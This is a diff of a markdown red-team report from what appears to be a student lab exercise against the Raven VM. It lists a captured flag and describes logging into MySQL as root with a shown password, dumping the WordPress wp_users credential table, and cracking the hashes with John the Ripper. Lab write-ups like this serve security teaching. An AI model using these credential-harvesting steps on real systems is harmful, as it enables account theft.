saglea/Final-Project/OffensiveTemplate.md

-Flag4:715dea6c055b9fe3337544932f2941ce
+- Flag4:715dea6c055b9fe3337544932f2941ce
 -**Exploit used**
      - Used MySQL database to gain access to user credentials.
      - Used John the Ripper to crack the password hash.
      - Used Python to gain root privileges.
      - User credentials are stored in the ‘wp_users table’ in the wordpress database.
      - I copied/saved the usernames and password hashes to my Kali machine in a file named wp_hashes.txt.
 -Commands:
-	-mysql -u root -p’R@v3nSecurity’
+	- mysql -u root -p’R@v3nSecurity’
-	-show databases;
+	- show databases;
-	-use wordpress;
+	- use wordpress;
-	-show tables;
+	- show tables;
-	-select * from wp_users;
+	- select * from wp_users;

 ![redteam14](https://user-images.githubusercontent.com/91024338/143157919-218bf1ae-63f2-4b22-80a1-ac2fc98b7226.JPG)